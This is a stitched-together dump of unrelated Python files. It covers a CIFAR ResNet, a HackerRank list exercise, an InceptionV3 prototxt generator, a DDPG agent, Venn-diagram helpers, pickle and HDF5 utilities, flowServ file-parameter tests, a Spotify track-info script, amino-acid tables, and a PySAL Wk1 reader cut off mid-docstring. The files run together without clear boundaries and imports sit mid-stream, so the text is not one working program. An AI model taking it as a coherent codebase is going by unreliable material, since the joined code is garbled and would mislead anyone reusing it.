    def __init__(self, block, num_blocks, num_classes=10):
        super(ResNet, self).__init__()
        self.classes = num_classes
        self.planes = [16, 32, 64]
        self.strides = [1, 2, 2]
        self.current_planes = 16
        # self.current_size = 32
        self.conv1 = nn.Conv2d(3, self.current_planes, kernel_size=3, stride=1, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(self.current_planes)
        self.group1 = self._make_layer(block, self.planes[0], num_blocks=num_blocks[0], stride=self.strides[0])
        self.group2 = self._make_layer(block, self.planes[1], num_blocks=num_blocks[1], stride=self.strides[1])
        self.group3 = self._make_layer(block, self.planes[2], num_blocks=num_blocks[2], stride=self.strides[2])
        # BUG FIX: the final feature width is planes[2] * block.expansion
        # (e.g. 4x for Bottleneck); the original hard-coded self.planes[2]
        # and broke for any block with expansion != 1. For expansion == 1
        # blocks this is identical to the original.
        self.linear = nn.Linear(self.planes[2] * block.expansion, num_classes)

    def _make_layer(self, block, planes, num_blocks, stride):
        """Build one stage: first block downsamples by `stride`, the rest use 1."""
        strides = [stride] + [1] * (num_blocks - 1)
        layers = []
        for stride in strides:
            # BUG FIX: pass the base plane count; blocks already widen their
            # output by `expansion` internally (the original multiplied twice).
            layers.append(block(self.current_planes, planes, stride))
            self.current_planes = planes * block.expansion
        return nn.Sequential(*layers)

    def forward(self, x):
        x = torch.relu(self.bn1(self.conv1(x)))
        x = self.group1(x)
        x = self.group2(x)
        x = self.group3(x)
        # Global average pool over the remaining spatial extent, then classify.
        x = F.avg_pool2d(x, x.size(3))
        x = x.view(x.size(0), -1)
        x = self.linear(x)
        return x
def ResNet56():
    """56-layer CIFAR ResNet: 9 BasicBlocks per stage."""
    return ResNet(BasicBlock, [9, 9, 9])


def ResNet110():
    """110-layer CIFAR ResNet: 18 BasicBlocks per stage."""
    return ResNet(BasicBlock, [18, 18, 18])


def ResNet50():
    # NOTE(review): ImageNet-style 4-entry block counts, but the ResNet class
    # above only builds 3 stages — the 4th entry is ignored. Confirm intended.
    return ResNet(Bottleneck, [3, 4, 6, 3])


def ResNet101():
    # NOTE(review): see ResNet50 — only the first 3 entries are consumed.
    return ResNet(Bottleneck, [3, 4, 23, 3])


def ResNet152():
    # NOTE(review): see ResNet50 — only the first 3 entries are consumed.
    return ResNet(Bottleneck, [3, 8, 36, 3])
|
# List-command interpreter for the HackerRank "Lists" exercise:
# https://www.hackerrank.com/challenges/python-lists/problem
if __name__ == '__main__':
    command_count = int(input())
    items = []
    list_methods = ("insert", "remove", "append", "sort", "pop", "reverse")
    for _ in range(command_count):
        command, *arguments = input().split()
        if command == "print":
            print(items)
        elif command in list_methods:
            # Each remaining command maps 1:1 onto a list method whose
            # arguments (if any) are integers; unknown commands are ignored,
            # matching the original if/elif chain.
            getattr(items, command)(*(int(a) for a in arguments))
import inception_v3
def save_proto(proto, prototxt):
    """Write the text form of *proto* to the file at path *prototxt*."""
    text = str(proto)
    with open(prototxt, 'w') as out_file:
        out_file.write(text)
if __name__ == '__main__':
    # Build InceptionV3 network definitions against the ImageNet train/test
    # LMDBs (1000 classes, batch size 64) and dump the train and TEST-phase
    # variants as .prototxt text files.
    model = inception_v3.InceptionV3('imagenet_test_lmdb', 'imagenet_train_lmdb', 1000)
    train_proto = model.inception_v3_proto(64)
    test_proto = model.inception_v3_proto(64, phase='TEST')
    save_proto(train_proto, 'imagenet_train.prototxt')
    save_proto(test_proto, 'imagenet_test.prototxt')
|
import sys
import torch
import torch.nn as nn
from torch.optim import Adam
from torch.autograd import Variable
import torch.nn.functional as F
def soft_update(target, source, tau):
    """Polyak-average source parameters into target: t <- (1 - tau)*t + tau*s."""
    for dst, src in zip(target.parameters(), source.parameters()):
        blended = dst.data.mul(1.0 - tau).add(src.data.mul(tau))
        dst.data.copy_(blended)
def hard_update(target, source):
    """Copy every source parameter into the matching target parameter verbatim."""
    for dst, src in zip(target.parameters(), source.parameters()):
        dst.data.copy_(src.data)
"""
From: https://github.com/pytorch/pytorch/issues/1959
There's an official LayerNorm implementation in pytorch now, but it hasn't been included in
pip version yet. This is a temporary version
This slows down training by a bit
"""
class LayerNorm(nn.Module):
    """Layer normalization over all non-batch dimensions, with an optional
    learned per-feature affine transform (see the module note above)."""

    def __init__(self, num_features, eps=1e-5, affine=True):
        super(LayerNorm, self).__init__()
        self.num_features = num_features
        self.affine = affine
        # eps stabilizes the division when the per-sample std is tiny.
        self.eps = eps
        if self.affine:
            self.gamma = nn.Parameter(torch.Tensor(num_features).uniform_())
            self.beta = nn.Parameter(torch.zeros(num_features))

    def forward(self, x):
        # Mean/std are computed per sample across all remaining dimensions,
        # then broadcast back over the input shape.
        shape = [-1] + [1] * (x.dim() - 1)
        mean = x.view(x.size(0), -1).mean(1).view(*shape)
        std = x.view(x.size(0), -1).std(1).view(*shape)
        y = (x - mean) / (std + self.eps)
        if self.affine:
            shape = [1, -1] + [1] * (x.dim() - 2)
            y = self.gamma.view(*shape) * y + self.beta.view(*shape)
        return y


# NOTE(review): this monkey-patches torch.nn, shadowing the official
# nn.LayerNorm for everything constructed after this module is imported
# (Actor and Critic below rely on it) — confirm this is still intended.
nn.LayerNorm = LayerNorm
class Actor(nn.Module):
    """Policy network: two hidden layers (optionally layer-normalized)
    producing either a softmax over discrete actions or a tanh-squashed
    continuous action vector.
    """

    def __init__(self, hidden_size, num_inputs, action_space, discrete, no_ln):
        super(Actor, self).__init__()
        self.no_ln = no_ln
        self.discrete = discrete
        self.action_space = action_space
        # Discrete spaces expose `.n`; continuous spaces expose `.shape`.
        if self.discrete:
            num_outputs = action_space.n
        else:
            num_outputs = action_space.shape[0]
        self.linear1 = nn.Linear(num_inputs, hidden_size)
        self.ln1 = nn.LayerNorm(hidden_size)
        self.linear2 = nn.Linear(hidden_size, hidden_size)
        self.ln2 = nn.LayerNorm(hidden_size)
        self.mu = nn.Linear(hidden_size, num_outputs)
        # Shrink the output layer so initial actions start near zero.
        self.mu.weight.data.mul_(0.1)
        self.mu.bias.data.mul_(0.1)

    def forward(self, inputs):
        x = inputs
        x = self.linear1(x)
        if not self.no_ln:
            x = self.ln1(x)
        x = F.relu(x)
        x = self.linear2(x)
        if not self.no_ln:
            x = self.ln2(x)
        x = F.relu(x)
        if self.discrete:
            mu = F.softmax(self.mu(x), dim=1)
        else:
            # FIX: F.tanh is deprecated; torch.tanh is the supported equivalent.
            mu = torch.tanh(self.mu(x))
        return mu
class Critic(nn.Module):
    """Q-network: the state passes through one hidden layer, the action vector
    is then concatenated, and a second hidden layer plus a linear head produce
    the scalar Q(s, a)."""

    def __init__(self, hidden_size, num_inputs, action_space, discrete, no_ln):
        super(Critic, self).__init__()
        self.no_ln = no_ln
        self.action_space = action_space
        self.discrete = discrete
        # Action width: `.n` for discrete spaces, `.shape[0]` for continuous.
        if self.discrete:
            num_outputs = action_space.n
        else:
            num_outputs = action_space.shape[0]
        self.linear1 = nn.Linear(num_inputs, hidden_size)
        self.ln1 = nn.LayerNorm(hidden_size)
        # The action joins the network after the first hidden layer.
        self.linear2 = nn.Linear(hidden_size+num_outputs, hidden_size)
        self.ln2 = nn.LayerNorm(hidden_size)
        self.V = nn.Linear(hidden_size, 1)
        # Scale down the head so initial value estimates start near zero.
        self.V.weight.data.mul_(0.1)
        self.V.bias.data.mul_(0.1)

    def forward(self, inputs, actions):
        x = inputs
        x = self.linear1(x)
        if not self.no_ln:
            x = self.ln1(x)
        x = F.relu(x)
        x = torch.cat((x, actions), 1)
        x = self.linear2(x)
        if not self.no_ln:
            x = self.ln2(x)
        x = F.relu(x)
        V = self.V(x)
        return V
class DDPG(object):
    """Deep Deterministic Policy Gradient agent with target networks and
    optional action-space / parameter-space exploration noise.

    All networks are pinned to CUDA (`self.device`); targets start as exact
    copies of the online networks and track them with Polyak averaging.
    """

    def __init__(self, gamma, tau, hidden_size, num_inputs, action_space, discrete, lr, args):
        self.args = args
        self.num_inputs = num_inputs
        self.action_space = action_space
        self.discrete = discrete
        self.device = torch.device('cuda')
        self.actor = Actor(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
        self.actor_target = Actor(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
        self.actor_perturbed = Actor(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
        self.actor_optim = Adam(self.actor.parameters(), lr=lr[0])
        self.critic = Critic(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
        self.critic_target = Critic(hidden_size, self.num_inputs, self.action_space, discrete, args.no_ln).to(self.device)
        self.critic_optim = Adam(self.critic.parameters(), lr=lr[1])
        self.gamma = gamma
        self.tau = tau
        hard_update(self.actor_target, self.actor)  # Make sure target is with the same weight
        hard_update(self.critic_target, self.critic)

    def select_action(self, state, action_noise=None, param_noise=None, explore=True):
        """Return an action for `state`.

        Discrete: (sampled-or-argmax action, probabilities, entropy).
        Continuous: (clamped action, None, None).
        """
        self.actor.eval()
        if param_noise is not None:
            mu = self.actor_perturbed((Variable(state)))
        else:
            mu = self.actor((Variable(state)))
        self.actor.train()
        mu = mu.data
        if action_noise is not None:
            mu += torch.Tensor(action_noise.noise())
        if self.discrete:
            entropy = -(torch.log(mu) * mu).sum(1).mean()
            if explore:
                return mu.multinomial(1), mu, entropy
            else:
                return mu.max(1, keepdim=True)[1], mu, entropy
        else:
            return mu.clamp(-1, 1), None, None

    def update_parameters(self, batch):
        """One critic + actor update from a batch of transitions; returns
        (value_loss, policy_loss) as floats."""
        state_batch = torch.stack(batch.state, dim=0)
        action_batch = torch.stack(batch.action, dim=0)
        reward_batch = torch.stack(batch.reward, dim=0)
        mask_batch = torch.stack(batch.mask, dim=0)
        next_state_batch = torch.stack(batch.next_state, dim=0)
        # One-step TD target built from the *target* networks.
        next_action_batch = self.actor_target(next_state_batch)
        next_state_action_values = self.critic_target(next_state_batch, next_action_batch)
        #reward_batch = reward_batch.unsqueeze(1)
        #mask_batch = mask_batch.unsqueeze(1)
        expected_state_action_batch = reward_batch + (self.gamma * mask_batch * next_state_action_values)
        self.critic_optim.zero_grad()
        state_action_batch = self.critic((state_batch), (action_batch))
        value_loss = F.mse_loss(state_action_batch, expected_state_action_batch)
        value_loss.backward()
        self.critic_optim.step()
        # Actor maximizes Q(s, pi(s)) => minimize its negation.
        self.actor_optim.zero_grad()
        policy_loss = -self.critic((state_batch), self.actor((state_batch)))
        policy_loss = policy_loss.mean()
        policy_loss.backward()
        self.actor_optim.step()
        soft_update(self.actor_target, self.actor, self.tau)
        soft_update(self.critic_target, self.critic, self.tau)
        return value_loss.item(), policy_loss.item()

    def perturb_actor_parameters(self, param_noise):
        """Apply parameter noise to actor model, for exploration"""
        hard_update(self.actor_perturbed, self.actor)
        params = self.actor_perturbed.state_dict()
        for name in params:
            if 'ln' in name:
                # BUG FIX: the original used `pass`, which fell through and
                # perturbed LayerNorm parameters anyway; `continue` skips them
                # as the check clearly intends.
                continue
            param = params[name]
            # BUG FIX: randn_like keeps the noise on the parameter's
            # device/dtype; plain torch.randn produced a CPU tensor that fails
            # against the CUDA-pinned actor.
            param += torch.randn_like(param) * param_noise.current_stddev

    def save_model(self, env_name, suffix="", actor_path=None, critic_path=None):
        """Save actor/critic state dicts under models/ (paths may be overridden)."""
        import os  # BUG FIX: `os` was used here but never imported at module level
        if not os.path.exists('models/'):
            os.makedirs('models/')
        if actor_path is None:
            actor_path = "models/ddpg_actor_{}_{}".format(env_name, suffix)
        if critic_path is None:
            critic_path = "models/ddpg_critic_{}_{}".format(env_name, suffix)
        print('Saving models to {} and {}'.format(actor_path, critic_path))
        torch.save(self.actor.state_dict(), actor_path)
        torch.save(self.critic.state_dict(), critic_path)

    def load_model(self, actor_path, critic_path):
        """Load actor and/or critic weights from the given checkpoint paths."""
        print('Loading models from {} and {}'.format(actor_path, critic_path))
        if actor_path is not None:
            self.actor.load_state_dict(torch.load(actor_path))
        if critic_path is not None:
            self.critic.load_state_dict(torch.load(critic_path))
'''
Venn diagram plotting routines.
Utility routines
Copyright 2012, Konstantin Tretyakov.
http://kt.era.ee/
Licensed under MIT license.
'''
from matplotlib_venn._venn2 import venn2, compute_venn2_subsets
from matplotlib_venn._venn3 import venn3, compute_venn3_subsets
def venn2_unweighted(subsets, set_labels=('A', 'B'), set_colors=('r', 'g'), alpha=0.4, normalize_to=1.0, subset_areas=(1, 1, 1), ax=None):
    '''
    The version of venn2 without area-weighting.
    It is implemented as a wrapper around venn2: the diagram is drawn with the
    fixed `subset_areas` (all equal by default), and the region labels are then
    replaced with the actual subset sizes derived from `subsets`.
    The parameters are the same as those of venn2; `subset_areas` additionally
    specifies the areas used for drawing (change it within reason).
    '''
    diagram = venn2(subset_areas, set_labels, set_colors, alpha, normalize_to, ax)
    # Region ids in venn2's "AB" bitmask order.
    region_ids = ['10', '01', '11']
    if isinstance(subsets, dict):
        sizes = [subsets.get(rid, 0) for rid in region_ids]
    elif len(subsets) == 2:
        sizes = compute_venn2_subsets(*subsets)
    else:
        sizes = subsets
    # Overwrite each region label with the true size.
    for idx, rid in enumerate(region_ids):
        label = diagram.get_label_by_id(rid)
        if label is not None:
            label.set_text(str(sizes[idx]))
    return diagram
def venn3_unweighted(subsets, set_labels=('A', 'B', 'C'), set_colors=('r', 'g', 'b'), alpha=0.4, normalize_to=1.0, subset_areas=(1, 1, 1, 1, 1, 1, 1), ax=None):
    '''
    The version of venn3 without area-weighting: every region is drawn with
    the area given in ``subset_areas`` (all 1 by default, i.e. equal).

    Implemented as a wrapper around venn3: venn3 is invoked with the fixed
    region areas, and the region labels are then overwritten with the actual
    subset sizes taken from ``subsets``.  All other parameters are the same
    as for venn3.
    '''
    diagram = venn3(subset_areas, set_labels, set_colors, alpha, normalize_to, ax)
    region_ids = ('100', '010', '110', '001', '101', '011', '111')
    # Normalize `subsets` to a sequence of seven region sizes.
    if isinstance(subsets, dict):
        sizes = [subsets.get(region, 0) for region in region_ids]
    elif len(subsets) == 3:
        sizes = compute_venn3_subsets(*subsets)
    else:
        sizes = subsets
    for region, size in zip(region_ids, sizes):
        label = diagram.get_label_by_id(region)
        if label is not None:
            label.set_text(str(size))
    return diagram
import numpy as np
import pickle
import gzip
import h5py
def save_zipped_pickle(obj, filename, protocol=-1):
    """Pickle *obj* (with the given protocol) and write it gzip-compressed
    to *filename*."""
    out = gzip.open(filename, 'wb')
    try:
        pickle.dump(obj, out, protocol)
    finally:
        out.close()
def load_zipped_pickle(filename):
    """Load and return a pickled object from the gzip file *filename*."""
    with gzip.open(filename, 'rb') as fh:
        return pickle.load(fh)
def save_to_hdf5_file(datasets: dict, file_name: str, compression=None):
    """Write each (name -> array-like) entry of *datasets* as a dataset in
    a new HDF5 file at *file_name* (any existing file is overwritten).

    Parameters
    ----------
    datasets : dict
        Mapping of dataset name to array-like data.
    file_name : str
        Destination path for the HDF5 file.
    compression : str or None
        Forwarded to h5py's create_dataset (e.g. 'gzip').
    """
    # The context manager flushes and closes the file even when
    # create_dataset raises; the original leaked the handle on error.
    with h5py.File(file_name, 'w') as h:
        for name, data in datasets.items():
            h.create_dataset(name, data=data, compression=compression)
def read_from_hdf5_file(file_name: str, ds_name: str):
    """Open *file_name* read-only and return its dataset named *ds_name*.

    NOTE(review): the h5py.File handle is left open deliberately -- the
    returned Dataset is lazy and is only readable while the file is open --
    but nothing ever closes it, so the handle leaks.  Confirm callers copy
    the data out (e.g. ``ds[()]``) or accept the open handle.
    """
    h = h5py.File(file_name, 'r')
    return h[ds_name]
def create_record(element_type, value=None):
    """Build a numpy record of structured dtype *element_type*.

    With no *value*, the record is zero-filled; otherwise *value* supplies
    the field values.
    """
    if value is not None:
        return np.rec.array(value, dtype=element_type)
    # Zero-filled scalar record: take the single element of a one-element
    # zeroed array so the result is a record, not an array of records.
    blank = np.zeros((1), dtype=element_type)[0]
    return np.rec.array(blank, dtype=element_type)
|
# This file is part of the Reproducible and Reusable Data Analysis Workflow
# Server (flowServ).
#
# Copyright (C) 2019-2021 NYU.
#
# flowServ is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Unit tests for file parameter declarations."""
from pathlib import Path
import os
import pytest
from flowserv.volume.fs import FSFile
from flowserv.model.parameter.files import InputDirectory, InputFile, File, PARA_FILE
from flowserv.volume.fs import FileSystemStorage
import flowserv.error as err
def test_invalid_serialization():
    """Test errors for invalid serializations."""
    # Document using the unknown key 'targetPath' instead of 'target'.
    doc = {
        'name': '0000',
        'dtype': PARA_FILE,
        'index': 0,
        'label': 'Input file',
        'isRequired': True,
        'targetPath': 'data/names.txt'
    }
    # With validation disabled the invalid key is tolerated ...
    File.from_dict(dict(doc), validate=False)
    # ... but the default (validating) path must reject it.
    with pytest.raises(err.InvalidParameterError):
        File.from_dict(dict(doc))
    # A non-file dtype raises a plain ValueError.
    with pytest.raises(ValueError):
        File.from_dict({
            'name': '0000',
            'dtype': 'string',
            'index': 0,
            'label': 'Name',
            'isRequired': True,
            'target': 'data/names.txt'
        })
def test_file_parameter_from_dict():
    """Test generating a file parameter declaration from a dictionary
    serialization.
    """
    # Round-trip: dict -> parameter -> dict -> parameter.
    doc = {
        'name': '0000',
        'dtype': PARA_FILE,
        'label': 'Names',
        'index': 2,
        'help': 'List of names',
        'defaultValue': 'data/default_names.txt',
        'isRequired': False,
        'group': 'inputs',
        'target': 'data/names.txt'
    }
    para = File.from_dict(File.to_dict(File.from_dict(doc)))
    # Every attribute must survive the round trip unchanged.
    assert para.is_file()
    assert para.name == '0000'
    assert para.dtype == PARA_FILE
    assert para.label == 'Names'
    assert para.index == 2
    assert para.help == 'List of names'
    assert para.default == 'data/default_names.txt'
    assert not para.required
    assert para.group == 'inputs'
    assert para.target == 'data/names.txt'
def test_parameter_value_dir(tmpdir):
    """Test directories as input parameter values."""
    # Source folder with two files in it.
    source_dir = os.path.join(tmpdir, 's1')
    os.makedirs(source_dir)
    for name in ('file.txt', 'data.json'):
        Path(os.path.join(source_dir, name)).touch()
    directory = InputDirectory(
        store=FileSystemStorage(basedir=source_dir),
        source=None,
        target='runs'
    )
    assert str(directory) == 'runs'
    # Copying places both files under the 'runs' target folder.
    destination = FileSystemStorage(basedir=os.path.join(tmpdir, 's2'))
    assert set(directory.copy(target=destination)) == {'runs/file.txt', 'runs/data.json'}
    for name in ('file.txt', 'data.json'):
        assert os.path.isfile(os.path.join(tmpdir, 's2', 'runs', name))
def test_parameter_value_file(tmpdir):
    """Test getting argument value for a file parameter."""
    filename = os.path.join(tmpdir, 'file.txt')
    Path(filename).touch()
    # -- Parameter target value
    para = File('0000', 0, target='data/names.txt')
    file = para.cast(FSFile(filename))
    assert isinstance(file, InputFile)
    assert str(file) == 'data/names.txt'
    assert file.copy(target=FileSystemStorage(basedir=os.path.join(tmpdir, 's1'))) == ['data/names.txt']
    # -- Parameter default value
    para = File('0000', 0, default='data/names.txt')
    file = para.cast(FSFile(filename))
    assert str(file) == 'data/names.txt'
    # -- Error for missing target
    para = File('0000', 0)
    with pytest.raises(err.InvalidArgumentError):
        para.cast(filename)
    # -- Missing file without error
    para = File('0000', 0, target='data/names.txt')
    # Fix: build the missing path inside tmpdir.  The original joined
    # 'missing.txt' onto the existing *file* path ('.../file.txt/missing.txt'),
    # which only produced a non-existent path by accident.
    missing = os.path.join(tmpdir, 'missing.txt')
    file = para.cast(FSFile(missing, raise_error=False))
    assert str(file) == 'data/names.txt'
|
#!/usr/bin/env python
import configparser
import os
import spotipy
import json
import sys
import logging
from etlutils.datafiles import get_monthly_file_path
# Sentinel meaning "value was found neither in the environment nor config.ini".
NOT_SET_VALUE = 'NOT SET'

config_parser = configparser.ConfigParser()
config_parser.read('config.ini')
client_id = config_parser.get('Login Parameters', 'client_id', fallback=NOT_SET_VALUE)
client_secret = config_parser.get('Login Parameters', 'client_secret', fallback=NOT_SET_VALUE)
# NOTE(review): access_token is read here but not used in this part of the
# script -- confirm it is consumed elsewhere.
access_token = config_parser.get('Login Parameters', 'access_token', fallback=NOT_SET_VALUE)
logging_level = config_parser.get('logging', 'logging_level', fallback=logging.INFO)
logging_file = config_parser.get('logging', 'logging_file', fallback=None)

# Prefer credentials already in the environment; fall back to config.ini.
# Fixed: the original compared against the sentinel with 'is', which only
# worked because the fallback returned the identical string object -- '=='
# expresses the intended value comparison.
if os.environ.get("SPOTIPY_CLIENT_ID", NOT_SET_VALUE) == NOT_SET_VALUE:
    if client_id == NOT_SET_VALUE:
        print('ERROR: Environment variable is not set and client id not read from config file')
        sys.exit(1)
    os.environ['SPOTIPY_CLIENT_ID'] = client_id
if os.environ.get("SPOTIPY_CLIENT_SECRET", NOT_SET_VALUE) == NOT_SET_VALUE:
    if client_secret == NOT_SET_VALUE:
        print('ERROR: Environment variable is not set and client secret not read from config file')
        sys.exit(1)
    os.environ['SPOTIPY_CLIENT_SECRET'] = client_secret
# Logger: everything at DEBUG+, filtered per handler below.
logger = logging.getLogger('get_track_info')
logger.setLevel(logging.DEBUG)

formatter = logging.Formatter('%(name)s - %(asctime)s (%(levelname)s): %(message)s')
formatter.datefmt = '%Y-%m-%d %H:%M:%S %z'

# Console shows INFO and above.
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)

# Optional file handler, level taken from config.ini.
if logging_file:
    file_handler = logging.FileHandler(logging_file)
    file_handler.setLevel(logging_level)
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)
# Interactive OAuth flow; may open a browser on first run.
token = spotipy.util.prompt_for_user_token('intonarumori', 'user-library-read user-read-recently-played playlist-read-private playlist-read-collaborative user-top-read', client_id, client_secret, redirect_uri='https://127.0.0.1:8080')
sp = spotipy.Spotify(auth=token)

# Fetch metadata, audio analysis and audio features for a single track.
track_id = "5ObtaYq6nPnKliDjfMFjAI"
tracks_info = {
    track_id: {
        "info": sp.track(track_id),
        "analysis": sp.audio_analysis(track_id),
        "features": sp.audio_features(tracks=[track_id]),
        "plays": []
    }
}
with open("tracks.json", 'w') as f:
    json.dump(tracks_info, f)
|
from collections import defaultdict
# One-hot index for the 20 standard amino acids plus '-' (gap) at index 20.
onehot_dict = {'A': 0, 'C': 1, 'D': 2, 'E': 3, 'F': 4, 'G': 5, 'H': 6, 'I': 7, 'K': 8, 'L': 9, 'M': 10,
'N': 11, 'P': 12, 'Q': 13, 'R': 14, 'S': 15, 'T': 16, 'V': 17, 'W': 18, 'Y': 19,'-':20}
# Any unrecognized character maps to the gap index.  The lambda looks up '-'
# at call time, after onehot_dict has been rebound to the defaultdict itself.
onehot_dict = defaultdict(lambda: onehot_dict['-'], onehot_dict)
# Inverse mapping: index -> letter.
onehot_dict_inv= {v:k for k,v in onehot_dict.items()}
# Three-letter residue name -> one-letter code.  HSE/HSD are histidine
# protonation states; UNK is unknown.
aa_dict = {'ALA': 'A', 'ARG': 'R', 'ASN': 'N', 'ASP': 'D', 'CYS': 'C', 'GLU': 'E',
'GLN': 'Q', 'GLY': 'G', 'HIS': 'H', 'ILE': 'I', 'LEU': 'L', 'LYS': 'K',
'MET': 'M', 'PHE': 'F', 'PRO': 'P', 'SER': 'S', 'THR': 'T', 'TRP': 'W',
'TYR': 'Y', 'VAL': 'V', 'HSE': 'H', 'HSD': 'H', 'UNK': 'X'}
# Inverse mapping: duplicate one-letter codes ('H' from HIS/HSE/HSD) collapse
# to the last three-letter key in insertion order.
aa_dict_inv = {v:k for k,v in aa_dict.items()}
|
import struct
from .. import fileio
from ...weights import W
__author__ = "Myunghwa Hwang <mhwang4@gmail.com>"
__all__ = ["Wk1IO"]
class Wk1IO(fileio.FileIO):
    """
    MATLAB wk1read.m and wk1write.m that were written by Brian M. Bourgault in 10/22/93

    Opens, reads, and writes weights file objects in Lotus Wk1 format.

    Lotus Wk1 file is used in Dr. LeSage's MATLAB Econometrics library.
    A Wk1 file holds a spatial weights object in a full matrix form
    without any row and column headers.
    The maximum number of columns supported in a Wk1 file is 256.
    Wk1 starts the row (column) number from 0 and
    uses little endian binary encoding.
    In PySAL, when the number of observations is n,
    it is assumed that each cell of a n\*n(=m) matrix either is a blank or
    have a number.

    The internal structure of a Wk1 file written by PySAL is as follows:
    [BOF][DIM][CPI][CAL][CMODE][CORD][SPLIT][SYNC][CURS][WIN]
    [HCOL][MRG][LBL][CELL_1]...[CELL_m][EOF]
    where [CELL_k] equals to [DTYPE][DLEN][DFORMAT][CINDEX][CVALUE].
    The parts between [BOF] and [CELL_1] are variable according to the software
    program used to write a wk1 file. While reading a wk1 file,
    PySAL ignores them.
    Each part of this structure is detailed below.

    .. table:: Lotus WK1 fields

    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |Part         |Description          |Data Type                |Length |Value                        |
    +=============+=====================+=========================+=======+=============================+
    |[BOF]        |Beginning of field   |unsigned character       |6      |0,0,2,0,6,4                  |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[DIM]        |Matrix dimension     |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [DIMDTYPE]  |Type of dim. rec     |unsigned short           |2      |6                            |
    | [DIMLEN]    |Length of dim. rec   |unsigned short           |2      |8                            |
    | [DIMVAL]    |Value of dim. rec    |unsigned short           |8      |0,0,n,n                      |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[CPI]        |CPI                  |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [CPITYPE]   |Type of cpi rec      |unsigned short           |2      |150                          |
    | [CPILEN]    |Length of cpi rec    |unsigned short           |2      |6                            |
    | [CPIVAL]    |Value of cpi rec     |unsigned char            |6      |0,0,0,0,0,0                  |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[CAL]        |calcount             |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [CALTYPE]   |Type of calcount rec |unsigned short           |2      |47                           |
    | [CALLEN]    |Length calcount rec  |unsigned short           |2      |1                            |
    | [CALVAL]    |Value of calcount rec|unsigned char            |1      |0                            |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[CMODE]      |calmode              |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [CMODETYP]  |Type of calmode rec  |unsigned short           |2      |2                            |
    | [CMODELEN]  |Length of calmode rec|unsigned short           |2      |1                            |
    | [CMODEVAL]  |Value of calmode rec |signed char              |1      |0                            |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[CORD]       |calorder             |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [CORDTYPE]  |Type of calorder rec |unsigned short           |2      |3                            |
    | [CORDLEN]   |Length calorder rec  |unsigned short           |2      |1                            |
    | [CORDVAL]   |Value of calorder rec|signed char              |1      |0                            |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[SPLIT]      |split                |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [SPLTYPE]   |Type of split rec    |unsigned short           |2      |4                            |
    | [SPLLEN]    |Length of split rec  |unsigned short           |2      |1                            |
    | [SPLVAL]    |Value of split rec   |signed char              |1      |0                            |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[SYNC]       |sync                 |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [SYNCTYP]   |Type of sync rec     |unsigned short           |2      |5                            |
    | [SYNCLEN]   |Length of sync rec   |unsigned short           |2      |1                            |
    | [SYNCVAL]   |Value of sync rec    |signed char              |1      |0                            |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[CURS]       |cursor               |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [CURSTYP]   |Type of cursor rec   |unsigned short           |2      |49                           |
    | [CURSLEN]   |Length of cursor rec |unsigned short           |2      |1                            |
    | [CURSVAL]   |Value of cursor rec  |signed char              |1      |1                            |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[WIN]        |window               |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [WINTYPE]   |Type of window rec   |unsigned short           |2      |7                            |
    | [WINLEN]    |Length of window rec |unsigned short           |2      |32                           |
    | [WINVAL1]   |Value 1 of window rec|unsigned short           |4      |0,0                          |
    | [WINVAL2]   |Value 2 of window rec|signed char              |2      |113,0                        |
    | [WINVAL3]   |Value 3 of window rec|unsigned short           |26     |10,n,n,0,0,0,0,0,0,0,0,72,0  |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[HCOL]       |hidcol               |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [HCOLTYP]   |Type of hidcol rec   |unsigned short           |2      |100                          |
    | [HCOLLEN]   |Length of hidcol rec |unsigned short           |2      |32                           |
    | [HCOLVAL]   |Value of hidcol rec  |signed char              |32     |0*32                         |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[MRG]        |margins              |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [MRGTYPE]   |Type of margins rec  |unsigned short           |2      |40                           |
    | [MRGLEN]    |Length of margins rec|unsigned short           |2      |10                           |
    | [MRGVAL]    |Value of margins rec |unsigned short           |10     |4,76,66,2,2                  |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[LBL]        |labels               |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [LBLTYPE]   |Type of labels rec   |unsigned short           |2      |41                           |
    | [LBLLEN]    |Length of labels rec |unsigned short           |2      |1                            |
    | [LBLVAL]    |Value of labels rec  |char                     |1      |'                            |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    |[CELL_k]     |
    +-------------+---------------------+-------------------------+-------+-----------------------------+
    | [DTYPE]     |Type of cell data    |unsigned short           |2      |[DTYPE][0]==0: end of file   |
    |             |                     |                         |       |          ==14: number       |
    |             |                     |                         |       |          ==16: formula      |
    |             |                     |                         |       |          ==13: integer      |
    |             |                     |                         |       |          ==11: nrange       |
